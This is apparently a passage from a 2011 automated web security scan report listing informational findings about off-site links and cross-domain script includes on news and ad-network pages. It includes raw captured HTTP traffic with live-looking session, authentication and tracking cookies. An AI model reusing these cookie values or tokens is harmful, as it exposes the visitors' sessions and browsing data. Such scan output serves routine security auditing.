GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:27 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:47:39 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Age: 48
Vary: Accept-Encoding
Content-Length: 10669
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF37 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:47:39 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...

18.31. http://www.scribd.com/embeds/63688924/content

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/63688924/content

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 53ms
Status: 200 OK
Age: 114539
X-Cache: HIT from squid03.local
Via: 1.1 squid03.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:55:47 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 9396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<base target="_top" />


<link href="http://s6.scribdassets.com/aggregated/css/base.css?1314908997" media="screen" rel="stylesheet" type="text/css" />
<link href="http://s7.scribdassets.com/aggregated/css/web.css?1314908997" media="screen" rel="stylesheet" type="text/css" />
<link href="http://s7.scribdassets.com/aggregated/css/fragments.css?1314908997" media="screen" rel="stylesheet" type="text/css" />


<!--[if gte IE 6]>
...[SNIP]...
</style>


<script src="http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997" type="text/javascript"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Scribd RSS feed" href="http://www.scribd.com/feeds/rss" />
<link rel="shortcut icon" href="http://s6.scribdassets.com/favicon.ico" />


<!-- BEGIN Asynchronous Google Analytics -->
...[SNIP]...
<div class="share_item"><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.scribd.com%2Fdoc%2F63688924%2FSummary-of-State-Collective-Bargaining-Agreements%23source%3Afacebook"><div class="share_button" id="share_on_facebook">
...[SNIP]...
<div class="share_item"><a href="http://twitter.com/home?source=scribd.com&amp;status=Reading%20%22Summary%20of%20%20State%20Collective%20Bargaining%20Agreements%20%22%20on%20Scribd%20http%3A%2F%2Fwww.scribd.com%2Fdoc%2F63688924%20%23Readcast"><div class="share_button" id="share_on_twitter">
...[SNIP]...
<!-- Start Quantcast tag -->

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-13DPpb-yg8ofc" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-13DPpb-yg8ofc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=9304646&cv=2.0&cj=1" />
</noscript>
...[SNIP]...

18.32. http://www.scribd.com/embeds/63688924/content_inner

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/63688924/content_inner

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /embeds/63688924/content_inner?start_page=1 HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:59:34 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 30ms
Status: 200 OK
Age: 103946
X-Cache: HIT from squid01.local
Via: 1.1 squid01.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:59:33 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 25358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<base target="_top" />


<link href="http://s6.scribdassets.com/aggregated/css/base.css?1314908997" media="screen" rel="stylesheet" type="text/css" />
<link href="http://s7.scribdassets.com/aggregated/css/web.css?1314908997" media="screen" rel="stylesheet" type="text/css" />
<link href="http://s7.scribdassets.com/aggregated/css/fragments.css?1314908997" media="screen" rel="stylesheet" type="text/css" />


<!--[if gte IE 6]>
...[SNIP]...
</style>


<script src="http://s6.scribdassets.com/aggregated/javascript/base.js?1314908997" type="text/javascript"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Scribd RSS feed" href="http://www.scribd.com/feeds/rss" />
<link rel="shortcut icon" href="http://s6.scribdassets.com/favicon.ico" />


<!-- BEGIN Asynchronous Google Analytics -->
...[SNIP]...
</style>
<script type='text/javascript' src='http://fonts4.scribdassets.com/static/4gen.js?1314662118'> </script>
...[SNIP]...
</script>
<link rel='stylesheet' type='text/css' href='http://fonts1.scribdassets.com/static/4gen.css?1314662118'/>
<!--[if IE]>
...[SNIP]...
<!-->
<link rel='stylesheet' type='text/css' href='http://fonts1.scribdassets.com/static/4gen_non_ie.css?1314662118' />
<!--<![endif]-->
...[SNIP]...
<!-- Start Quantcast tag -->

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-13DPpb-yg8ofc" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-13DPpb-yg8ofc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=9304646&cv=2.0&cj=1" />
</noscript>
...[SNIP]...

19. Cross-domain script include
There are 48 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


19.1. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26912047&ahcid=2168902&bimpd=_P8jnlWa9XstK_JlmmehibBCY86uUcZ8orSis2gk3CgGuM8NRppyPQMYvcwYVWxeqx53lV-injqapvMTqVcy93ETQudoxG65t8gPvD3_8uXTH1PXOPFQZu8QV_sfud_H-APXWDieQ47BkVHFFBn37s3aR3R9fKaUZJwqF3RKDtidgFaK5usOyzENC88rTUlt9K10asyG35OWlNfIYOZ-eD5tcSKw-zblptFUhK9YrBvJ-WVZmeLXwW90Vc9Kb9XoiPnsI1H5EzsiLAXyc7PFNmMqw1dLCgnGdMDgUmN3gwdG_Ur_2SMU4K10y_Sli8mM2o2RfArbjquS3LhtH_oucb3wc-cQ7FRKnITKYzO3zYXWG83x93SQchtOADUffiJhCEHm6r5PNXkH9qRXbUWExW_-Tu619iR6e1KbNlVj8jLndn3HHWXSm6j08SLj-h_ckdMj51v2x5gNhdpsMl_xftjg47NtKOd3aMYaFKX0mDx-mbKM0JHYn1hPNWK3mE7pzqC_aS7mkgsjA3S3GAANk8l2hYjwLveMS5-0Prm8ku-d-0Mgw9kibbpEMGHOE3HL6dCtmc69w_hrmFS4bSqF1Ubrzov4KJkplEjIfx4sijhgID_WtH2HGV-ZlBaxQA1ij1j_O9y58VxgD6JjAd6GfmoJ8UbwkKQyww1upyp3jn-KeGFWA05C4wMLlJET2Sr393OncBALoxLqvhLiy_Csz4BhnEKFF2M8my_fgvGuVC-BGn7V08Zk_msX51p9Pm_1V71_KFY8MHiZdUStS_Pc88kzr_aJ80D7tEUMLPW-_InB3ZbanTW1OTZfNoJuT_Q8bPiK77OYvzyO19oo0lS1JrBteXm6E3IqGkdPbGLUoEv66yPDCbC2aqvzIe2Oz4Dl&acp=1.72 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:06 GMT
Set-Cookie: uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:05 GMT
Content-Length: 9577


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
0429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=2607056080429450331?;click=http://r.turn.com/r/formclick/id/WwSFP7EfLiQWAQ8AAwIBAA/url/;">\n</SCRIPT>
...[SNIP]...

19.2. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26912083&ahcid=2168938&bimpd=pCreIYJavyNiKT8OQHFCSnu-vORVAfADNWaIrVAJW9V1OJxo6MJDRlBTc3fVSGqORiXDRlomnL_mfAoVZXeCkL8wvAhJVp5vH1605NNaPKgd1x29xXl5OSgnSbh900QIFhYiHQW0teqBC570BVUfktff2qOd8TAuM1o70SLAMfwCKpFmO4iIlB0kM7YKTICsL7R4Llxu6gw1UDBG-W9xu9Cw1Mz4UX51ay3f8dUZrSSA7ScN_yzVCT_qn-_wh7GkjVBkWJOw8E0SsEBhkIDT30v0_tDzWZMCygX7uwRksdEjoCAUEtzyi3w02uZQh4CPlbbQCKaV1kCXC1z-_nrIRv3Dt_DOnJ6szh2BeUfdUcDG-dcfe7AZKpps-jRxx503w5ouEVi7AI_5bXPRNdcP8QFcyCrv21DOcZZtn_24bXnbuGlDBbzSoryu0WxJZt3-TbjA4JdW6zB8Hr71jKGygnf979g2SfUVLE2EEGA1_P18fHSjIFmLLv9mvWkjikr6tE1_pTGVcNndvBjk5O8WpORSUX8h57ktArQiQRf_VM7suSEszTFtXJTNBWjhIyl4HF2axn5veQQlnqlFyRkks1_f7KC3VLmRxk7zb_BZDIJlqbhnVBeCxCmDhdk0jNpMHiPyrAZz5UKLC_VL_S0H0uZu9JsuecfTkRFyKcv1KqxdXU0tBSOr2Azj03ZXjmB-xXJHA51HCyRbV39W-BZaYUYafA0sG2GU1QMSEGn7mGlP_0gfI5Dj0uZ98BGVjFp-ixyNrFPa4sCVYWwv6KsGYXxI4IYGMiYon4s4QKZwiq1HQL2uATEn9inEHrl7lClpZsz5pj9OB5Dloc6omzDygRQ_CVxmcL7l1mtL_HnfnUZw--1JIlgG4EVQJnxieWB1EvmONAwrRCaTz4lB29IygQ&acp=F2A40808BF222937&rtbacid=b955a540e6a0f13e962aa5535b75fe6909df734c HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771; fc=CP-kOX4iOSzQzmzsKgiCelsouvdm86lAqkJC4JDCvS1ZP8p8LWiVlYWj8mwoyMJnM74tT5yNflT44pP1rbQUdr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:29 GMT
Set-Cookie: uid=8397588332178697252; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:29 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=yKjiBNFeYaCqBQq9EKX_XuOtvx43KJO5Y8uCXkaobqPJxmeG753N3cyfpzvDjP2CWiAAKoJnCDlt6qAwGNpdjSA6EiGqn4ODhEiNrN01Etji3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:29 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:28 GMT
Content-Length: 10285


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
6222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;">\n</SCRIPT>
...[SNIP]...

19.3. http://blogs.sacbee.com/the_state_worker/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.sacbee.com
Path:   /the_state_worker/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /the_state_worker/ HTTP/1.1
Host: blogs.sacbee.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sacbee_user_auth=.threshold%7c.threshold%7cacv-5_2%7cx%7c1%7cMDVqbGpwenh0em5wfHYwMGptOW5sbGxudGwgcXJtdHB2dCAwdjlqMHZ2cnRrb3F6bGs5cjlqdDlua25wbnRybXFyMHF6dG0wdG54MHA%3d; s_cc=true; s_vnum=1317445200364%26vn%3D1; s_ppv=100; mi_ppu=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html; s_invisit=true; mi_ppn=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal; mi_pph=3000; mi_pvh=1000; mi_ppl=*Story; s_sq=nmsacramento%3D%2526pid%253DStory%25253A%2525203883102%25257CSprint%252520could%252520be%252520winner%252520in%252520thwarted%252520T-Mobile-AT%252526T%252520deal%2526pidt%253D1%2526oid%253Dhttp%25253A//blogs.sacbee.com/the_state_worker/%252523navlink%25253Dnavdrop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:07 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head
...[SNIP]...
<!-- JavaScript files -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
<div>
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=LSXLXVUXQN&format=embed&mode=data&count=3&width=300"></script>
...[SNIP]...
<div>
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=ZXANLLFMOV&format=embed&mode=data&width=300"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://init.lingospot.com/ls.js?key=3_Sacbee"></script>
...[SNIP]...

19.4. http://cdn.optmd.com/V2/89733/235451/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/89733/235451/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 02 Sep 2011 20:55:36 GMT
ETag: "ce5613-1a3-4abfb95404200"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:52:58 GMT
Content-Length: 419
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Personal Creations</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62?mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/"></script>
...[SNIP]...

19.5. http://community.sprint.com/baw/index.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/index.jspa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /baw/index.jspa HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:43 GMT
Server: Apache-Coyote/1.1
X-JAL: 314
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=445807 t=1315099123758151
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 169328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script> <script src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=sprintshare" type="text/javascript"></script>
...[SNIP]...

19.6. http://content.usatoday.com/communities/campusrivalry/topics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /communities/campusrivalry/topics HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Content-Length: 40492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:og=
...[SNIP]...
<!-- minimum jQuery version required by all scripts-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

19.7. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315115693&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2F2011%2F09%2F03%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-rest-url-parameter-injection-example-poc-report-sprintnet.html&dt=1315097710130&bpp=24&shv=r20110824&jsv=r20110719&correlator=1315097710547&frm=4&adk=1607234649&ga_vid=1516282008.1315097711&ga_sid=1315097711&ga_hid=478706506&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=246&biw=1217&bih=1037&eid=33895167%2C36887102&fu=0&ifi=1&dtd=532&xpc=tWKiPIw10q&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
